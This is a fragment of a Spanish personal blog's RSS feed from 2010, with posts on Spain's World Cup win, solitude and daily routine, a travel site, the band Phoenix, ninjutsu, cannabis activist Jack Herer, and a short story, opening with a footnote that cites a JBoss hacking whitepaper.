<hr size="1" /><a href="#_ftnref1">[1]</a> Shell obtenida del documento <a href="http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf">Hacking Jboss de Jörg Scheinert</a>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 612px; width: 1px; height: 1px; overflow: hidden;">
<pre><code>&lt;pre lang="java" line="1"&gt;</code></pre>
</div>
</pre>
<p><a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licencia de Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/80x15.png" /></a><br />Esta obra está bajo una <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">licencia de Creative Commons</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.synesthesic.net/?feed=rss2&amp;p=1332</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.synesthesic.net/?p=1332</feedburner:origLink></item>
		<item>
		<title>España, vuelve a ser grande</title>
		<link>http://feedproxy.google.com/~r/synsthesia/~3/7Dz_vRB22u4/</link>
		<comments>http://www.synesthesic.net/?p=1338#comments</comments>
		<pubDate>Mon, 12 Jul 2010 11:06:45 +0000</pubDate>
		<dc:creator>Willy Devil</dc:creator>
				<category><![CDATA[Noticias]]></category>
		<category><![CDATA[españa]]></category>
		<category><![CDATA[futbol]]></category>
		<category><![CDATA[Historia]]></category>
		<category><![CDATA[seleccion]]></category>

		<guid isPermaLink="false">http://www.synesthesic.net/?p=1338</guid>
		<description><![CDATA[Tras una vida de sequía en el fútbol, España se coloca a la cabeza del mundo. Ayer día 11 de Julio del 2010, toda España estaba unida y avanzaba hacía un objetivo común, ganar el mundial que tanto hemos deseado siempre. ¿Y lo conseguimos? No, hicimos mucho mas. Un partido épico, cercano a una batalla [...]]]></description>
			<content:encoded><![CDATA[<p>Tras una vida de sequía en el fútbol, España se coloca a la cabeza del mundo. Ayer día 11 de Julio del 2010, toda España estaba unida y avanzaba hacía un objetivo común, ganar el mundial que tanto hemos deseado siempre. ¿Y lo conseguimos?</p>
<p style="text-align: center;"><a href="http://www.elpais.com/articulo/deportes/Espana/Mundial/elpdepfutmunart/20100711elpepudep_13/Tes"><img class="aligncenter" title="Campeones!" src="/imagenes/seleccion_espanola.jpg" alt="España, Campeona Mundial!" width="550" height="181" /></a></p>
<p>No, hicimos mucho mas. Un partido épico, cercano a una batalla medieval, en donde las emociones saltaban a cada pase, a cada sucia entrada que recibíamos&#8230; en cada ocasión de gol se escucha un &#8220;Uyyyyy!&#8221; de una garganta única compuesta por mas de veinte millones de Españoles. Hoy, es historia, hoy, España vuelve a ser el imperio que fuimos antaño. Esto es emoción, esto, es fútbol, esto es rojigualda, esto es España.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.synesthesic.net/?feed=rss2&amp;p=1338</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.synesthesic.net/?p=1338</feedburner:origLink></item>
		<item>
		<title>El placer de estar solo</title>
		<link>http://feedproxy.google.com/~r/synsthesia/~3/d92UThk4h9A/</link>
		<comments>http://www.synesthesic.net/?p=1329#comments</comments>
		<pubDate>Wed, 23 Jun 2010 12:40:51 +0000</pubDate>
		<dc:creator>Willy Devil</dc:creator>
				<category><![CDATA[Reflexiones]]></category>
		<category><![CDATA[dia]]></category>
		<category><![CDATA[estres]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[nervios]]></category>
		<category><![CDATA[prisas]]></category>
		<category><![CDATA[relax]]></category>
		<category><![CDATA[soledad]]></category>
		<category><![CDATA[trabajo]]></category>
		<category><![CDATA[venir]]></category>
		<category><![CDATA[vida]]></category>

		<guid isPermaLink="false">http://www.synesthesic.net/?p=1329</guid>
		<description><![CDATA[Mucho tiempo sin escribir, como viene ocurriendo desde estos meses atrás hasta a ahora. Puedo decir, que quizá he perdido un poco la inspiración, surgen ideas nuevas, sin duda, pero se me hacen difíciles plasmarlas. La vuelta a los cambios también influye, nuevo trabajo, nuevos problemas que combatir y superar, proyectos, ideas, ocupan mi mente [...]]]></description>
			<content:encoded><![CDATA[<p>Mucho tiempo sin escribir, como viene ocurriendo desde estos meses atrás hasta a ahora. Puedo decir, que quizá he perdido un poco la inspiración, surgen ideas nuevas, sin duda, pero se me hacen difíciles plasmarlas.</p>
<p>La vuelta a los cambios también influye, nuevo trabajo, nuevos problemas que combatir y superar, proyectos, ideas, ocupan mi mente a lo largo y ancho del día.</p>
<p>Este momento, lo he tomado para romper la barrera entre el trabajo y la vida personal, para detenerme y analizar el vertiginoso ritmo de vida que llevamos:</p>
<p>- Levantarse (6:50 am)</p>
<p>- Desayunar (6:55 am)</p>
<p>- Ducharse (7:05 am)</p>
<p>- Vestirse (7:15 am)</p>
<p>- Subirse al autobús (7:30 am)</p>
<p>- Subirse al metro (7:40 am)</p>
<p>- Gimnasio (7:55 am)</p>
<p>- Ducharse (8:50 am)</p>
<p>- Vestirse (8:55 am)</p>
<p>- Trabajo (9:00 am)</p>
<p>- Comer (1:30 pm)</p>
<p>- Trabajo (2:00 pm)</p>
<p>- Salir a casa (7:00 pm)</p>
<p>- Llegar a casa (7:30-8:00 pm)</p>
<p>- Descansar un poco (8:40 pm)</p>
<p>- Preparar la cena (9:00 pm)</p>
<p>- Cenar (9:40 pm)</p>
<p>- Descansar un poco más (10:00 pm)</p>
<p>- Acostarse (11:30 pm)</p>
<p>En todo este tiempo, en todo el desglose de horas realizado (a grandes rasgos y sin entrar lógicamente excesivamente en detalles, y contando con que hay días que la rutina cambia), ¿cuanto tiempo tenemos para nosotros mismos? ¿Para estar por y para nosotros, por y para nuestra mente?</p>
<p>En el transporte publico, logro centrarme en mis pensamientos, en el gimnasio, estoy por y para mi. ¿El resto del día? Trabajo, amigos, familia, etc. No quiere decir que los repudie, ni mucho menos, las amistades, son muy importantes (y hay que cuidarlas, como a la pareja), al igual que mi familia, pero creo que no sabemos (o no sé), gestionar y buscar el máximo de tiempo para estar conmigo (aunque lo intento).</p>
<p>La soledad, como creo que he comentado alguna vez, es algo necesaria, vital, y es muy importante, saber aprender a estar así. Estando solos, la mente puede jugarnos malas pasadas, pero también, si conocemos nuestra forma de pensar, puede traernos grandes beneficios.</p>
<p>Creo que deberíamos aprender a gestionar mejor los tiempos, a ser mas conscientes de cada cosa que hacemos, como por ejemplo, disfrutar de la ducha rápida de la mañana, notar el agua caliente como cae sobre ti, como moja tu cara, cuerpo y cabello. En el gimnasio, notar como cada fibra de tus músculos tira de ti (o tiras tu de ellas), como las gotas de sudor corren por tu espalda, etc. Y en los momentos de descanso, centrarse en como te da el sol al lado de la ventana en la que estés, o como respiras y tratas de controlar tu respiración para que sea lo mas calmada posible.</p>
<p>Somos nosotros siendo acompañados por el mundo, no lo olvidéis, no el mundo que empuja de nosotros, aunque a veces parezca que así es. 1, 2, 3&#8230; Relax&#8230; 4, 5, 6&#8230; Mayor relajación&#8230; 7, 8, 9&#8230; Aun mas relajación&#8230; y 10, eres tu contigo mismo, aprende a disfrutarlo.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.synesthesic.net/?feed=rss2&amp;p=1329</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.synesthesic.net/?p=1329</feedburner:origLink></item>
		<item>
		<title>Sin dudas en los viajes</title>
		<link>http://feedproxy.google.com/~r/synsthesia/~3/CAjWAPp1iS8/</link>
		<comments>http://www.synesthesic.net/?p=1327#comments</comments>
		<pubDate>Mon, 31 May 2010 13:22:52 +0000</pubDate>
		<dc:creator>Willy Devil</dc:creator>
				<category><![CDATA[Recursos]]></category>
		<category><![CDATA[Viajes]]></category>
		<category><![CDATA[meneame]]></category>
		<category><![CDATA[preguntas]]></category>
		<category><![CDATA[recurso]]></category>
		<category><![CDATA[trabber]]></category>

		<guid isPermaLink="false">http://www.synesthesic.net/?p=1327</guid>
		<description><![CDATA[Navegando por Genbeta, he descubierto una curiosa pagina clon de &#8220;meneame&#8221; ha creado Trabber . Es una pagina en la cual, los usuarios, dan de alta sus inquietudes respeto al futuro viaje que tienen planeado, y la gente ayuda con sus respuestas o experiencias que han tenido. Interesante recurso a tener en cuenta. Mas información [...]]]></description>
			<content:encoded><![CDATA[<p>Navegando por <a href="http://www.genbeta.com/comunidades/trabber-respuestas-para-resolver-tus-dudas-viajeras">Genbeta</a>, he descubierto una curiosa pagina clon de &#8220;meneame&#8221; ha creado Trabber . Es una pagina en la cual, los usuarios, dan de alta sus inquietudes respeto al futuro viaje que tienen planeado, y la gente ayuda con sus respuestas o experiencias que han tenido. Interesante recurso a tener en cuenta.</p>
<p><span style="text-decoration: underline;">Mas información</span></p>
<p><a href="http://respuestas.trabber.com/">Trabber Respuestas</a> | Web Oficial</p>
]]></content:encoded>
			<wfw:commentRss>http://www.synesthesic.net/?feed=rss2&amp;p=1327</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.synesthesic.net/?p=1327</feedburner:origLink></item>
		<item>
		<title>Phoenix – If I Ever Feel Better</title>
		<link>http://feedproxy.google.com/~r/synsthesia/~3/Lr9A3B7N0Pw/</link>
		<comments>http://www.synesthesic.net/?p=1324#comments</comments>
		<pubDate>Tue, 25 May 2010 12:24:06 +0000</pubDate>
		<dc:creator>Willy Devil</dc:creator>
				<category><![CDATA[Musica]]></category>
		<category><![CDATA[Rock]]></category>
		<category><![CDATA[air]]></category>
		<category><![CDATA[alternativo]]></category>
		<category><![CDATA[daft punk]]></category>
		<category><![CDATA[frances]]></category>
		<category><![CDATA[francia]]></category>
		<category><![CDATA[phoenix]]></category>

		<guid isPermaLink="false">http://www.synesthesic.net/?p=1324</guid>
		<description><![CDATA[Hace mucho que no publico algo en lo que es mi &#8220;diario&#8221;, y no tengo escusa, es simplemente pereza, o escasez de ideas, o ambas al mismo tiempo. Para recordar viejos tiempos, os enseño un grupo que tuve el gusto de conocer el otro día, Phoenix. Phoenix, es un grupo de Rock Alternativo francés, con [...]]]></description>
			<content:encoded><![CDATA[<p>Hace mucho que no publico algo en lo que es mi &#8220;diario&#8221;, y no tengo escusa, es simplemente pereza, o escasez de ideas, o ambas al mismo tiempo. Para recordar viejos tiempos, os enseño un grupo que tuve el gusto de conocer el otro día, Phoenix. Phoenix, es un grupo de Rock Alternativo francés, con casi 10 años a sus espaldas. Este grupo ha tenido colaboraciones desde con Daft Punk, hasta con Air. Sin duda un grupo muy divertido y fácil de escuchar.</p>
<p><a href="http://www.synesthesic.net/?p=1324"><em>Pinche aquí para ver el vídeo</em></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.synesthesic.net/?feed=rss2&amp;p=1324</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.synesthesic.net/?p=1324</feedburner:origLink></item>
		<item>
		<title>Perseverancia y humilidad</title>
		<link>http://feedproxy.google.com/~r/synsthesia/~3/NFwOkQdRRpM/</link>
		<comments>http://www.synesthesic.net/?p=1322#comments</comments>
		<pubDate>Mon, 26 Apr 2010 13:44:54 +0000</pubDate>
		<dc:creator>Willy Devil</dc:creator>
				<category><![CDATA[Artes Marciales]]></category>
		<category><![CDATA[artes marciales]]></category>
		<category><![CDATA[collado]]></category>
		<category><![CDATA[ninjutsu]]></category>

		<guid isPermaLink="false">http://www.synesthesic.net/?p=1322</guid>
		<description><![CDATA[La esencia del Ninniku Seishin es el espíritu del ninja que ha desarrollado el uso de la perseverancia con el cuerpo, mente y subconsciente. Es la energía que se debe desarrollar a través del entrenamiento constante. Es ser capaz de recibir cualquier desaire, para después dejarlo ir, abandonando a la vez cualquier traza de resentimiento [...]]]></description>
			<content:encoded><![CDATA[<p>La esencia del Ninniku Seishin es el espíritu del ninja que ha desarrollado el uso de la perseverancia con el cuerpo, mente y subconsciente.</p>
<p>Es la energía que se debe desarrollar a través del entrenamiento constante.</p>
<p>Es ser capaz de recibir cualquier desaire, para después dejarlo ir, abandonando a la vez cualquier traza de resentimiento (Nintai Seishin).</p>
<p>El verdadero significado de “Nin” es “Kajo Waraku”, mantener un corazón tan pacifico, alegre y amoroso como una flor. No se debe de colocar el sable por delante del corazón.</p>
<p>Muy importante es adquirir también un buen conocimiento de las diversas tácticas que utilizan simultáneamente cuerpo y corazón, de manera que en caso de peligro seamos capaces de “desaparecer”. Esto se conoce como “Kyojitsu Tenkan Ho”, y se utiliza para vencer al mal con las energías de tierra, agua, fuego, aire y vacio, en defensa de uno mismo o de su tierra.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.synesthesic.net/?feed=rss2&amp;p=1322</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.synesthesic.net/?p=1322</feedburner:origLink></item>
		<item>
		<title>Muere Jack Herer, el emperador del Cannabis</title>
		<link>http://feedproxy.google.com/~r/synsthesia/~3/_HfPfmq8Np0/</link>
		<comments>http://www.synesthesic.net/?p=1320#comments</comments>
		<pubDate>Wed, 21 Apr 2010 06:59:21 +0000</pubDate>
		<dc:creator>Willy Devil</dc:creator>
				<category><![CDATA[Ciencia y cultura]]></category>
		<category><![CDATA[Medicina]]></category>
		<category><![CDATA[Pseudociencia]]></category>
		<category><![CDATA[cannabis]]></category>
		<category><![CDATA[herer]]></category>
		<category><![CDATA[jack]]></category>
		<category><![CDATA[jack herer]]></category>
		<category><![CDATA[legalizacion]]></category>

		<guid isPermaLink="false">http://www.synesthesic.net/?p=1320</guid>
		<description><![CDATA[En su momento, ya hable del cannabis, siempre desde mi propio punto de vista, hable de las cualidades y de sus defectos, y abogué, tal y como sigo haciendolo, por la legalización, como ya se va a debatir pronto en California, por ejemplo, y que pase por un control gubernamental, sanitario y comercial, para que [...]]]></description>
			<content:encoded><![CDATA[<p>En su <a href="http://www.synesthesic.net/?p=1181">momento</a>, ya hable del cannabis, siempre desde mi propio punto de vista, hable de las cualidades y de sus defectos, y abogué, tal y como sigo haciendolo, por la legalización, como ya se va a debatir pronto en California, por ejemplo, y que pase por un control gubernamental, sanitario y comercial, para que los consumidores, no necesiten buscarlo en el mercado negro, aumenten las arcas del estado, en consecuencia, el PIB del pais. Esta noticia, viene dada por la reciente muerte de Jack Herer, uno de los mayores activistas pro-legalización debido a una complicación cardíaca que venia sufriendo desde septiembre del año pasado.</p>
<blockquote><p>“Sólo existe un conocido recurso natural,  anual y renovable que es capaz de proveer la abrumadora mayoría del  papel y los textiles del mundo; de satisfacer todas las necesidades  energéticas para la industria, los transportes y los hogares del mundo;  mientras que al mismo tiempo reduce la contaminación, restituye la  tierra y limpia la atmósfera al mismo tiempo. Y es el cannabis cáñamo…  ¡la marihuana!” — Jack Herer<em>, The Emperor Wears No Clothes.</em></p></blockquote>
<p>Jack Herer, nació en Brooklin (Nueva York), el 18 de junio de 1939, en su juventud fue miembro  del partido republicano y contendió dos veces (1988 y 1992) por la  presidencia de Estados Unidos, fundó la organización HEM, Help End Marihuana Prohibition. Una gran figura, con una gran trayectoria. Jack Herer, deja como legado, un nombre de una variedad cannabica ganadora de múltiples concursos en distintos países.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.synesthesic.net/?feed=rss2&amp;p=1320</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.synesthesic.net/?p=1320</feedburner:origLink></item>
		<item>
		<title>Realidad difusa</title>
		<link>http://feedproxy.google.com/~r/synsthesia/~3/Bvk99zjcaT8/</link>
		<comments>http://www.synesthesic.net/?p=1318#comments</comments>
		<pubDate>Sun, 18 Apr 2010 13:58:42 +0000</pubDate>
		<dc:creator>Willy Devil</dc:creator>
				<category><![CDATA[Relatos]]></category>
		<category><![CDATA[difusa]]></category>
		<category><![CDATA[locura]]></category>
		<category><![CDATA[percepcion]]></category>
		<category><![CDATA[realidad]]></category>
		<category><![CDATA[relato]]></category>

		<guid isPermaLink="false">http://www.synesthesic.net/?p=1318</guid>
		<description><![CDATA[¿Lo he hecho? ¿Realmente lo he hecho? Algunos dicen que si, que me vieron hacerlo, que me oyeron decirlo, pero no soy realmente consciente, no tengo la sensación interior de haberlo hecho, de haberlo dicho, ¿la locura ata mis neuronas en una continua lucha interior? No lo se, pero cada vez mas, la seguridad de [...]]]></description>
			<content:encoded><![CDATA[<p>¿Lo he hecho? ¿Realmente lo he hecho? Algunos dicen que si, que me vieron hacerlo, que me oyeron decirlo, pero no soy realmente consciente, no tengo la sensación interior de haberlo hecho, de haberlo dicho, ¿la locura ata mis neuronas en una continua lucha interior? No lo se, pero cada vez mas, la seguridad de no haber hecho lo que se me acusa de haber realizado es mayor. Estoy seguro, pero por mas que lucho, por mas que trato de analizar distintas visiones, distintas formas de pensar, la situación minuto a mi minuto, lo dicho, lo hecho, no vislumbro ni un ápice de lo que se me acusa. ¿Es capaz la locura de cambiar tanto la percepción?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.synesthesic.net/?feed=rss2&amp;p=1318</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.synesthesic.net/?p=1318</feedburner:origLink></item>
	</channel>
</rss>
